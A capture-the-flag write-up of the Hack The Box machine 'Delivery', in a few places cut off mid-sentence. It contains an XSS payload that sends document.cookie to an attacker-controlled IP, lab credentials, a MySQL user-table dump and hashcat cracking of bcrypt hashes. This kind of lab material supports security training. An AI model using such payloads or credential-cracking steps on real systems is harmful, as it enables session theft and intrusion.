Writeup for Delivery from Hack the Box
nmap -sV -T4 -p- 10.10.10.222
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
From the website, there are two links:
Add the following to the
Note the information here:
We don't have a
@delivery.htbaccount, so we won't be able to access the MatterMost server just yet.
When submitting a ticket, the system is vulnerable to XSS.
<script> var i = new Image(); i.src = "http://10.10.14.16/log.php?q=" + escape(document.cookie); </script>
Unfortunately this doesn't work, anything with
Note that after creating a ticket, it says:
"If you want to add more information... just email ..."
So does this email simply forward everything it receives to the ticket?
- 1.We needed a
- 2.We needed email verification
The email does indeed forward everything to the ticket content:
By navigating to the link in the email, we can verify our account.
And we can log in to view some sensitive information:
We can use the
maildeliverer:Youve_G0t_Mail!credential combination to authenticate and obtain SSH access to the server.
Right after we authenticate in, we are greeted by the
After a bit of exploring:
mmuser:Crack_The_MM_Admin_PWis used for the
mysqldatabase credentials. We can login to the 'local' MariaDB server:
mysql -u mmuser -p(
-u USERNAME -p, then enter the password when prompted)
SELECT * FROM Users;
I copied this into a text file.
Compile the password hashes into a
Remember the message in the MatterMost channel earlier? Most of these passwords should be variations of "PleaseSubscribe!"
We were also hinted to use hashcat rules.
cp /usr/share/hashcat/rules/best64.rule rules
Running hashcat on my host MacOS:
hashcat -m 3200 users.hash wordlist -r rules(since hashcat requires a GPU)
Show cracked hash:
hashcat -m 3200 users.hash --show
Cross-checking with the
su, then use the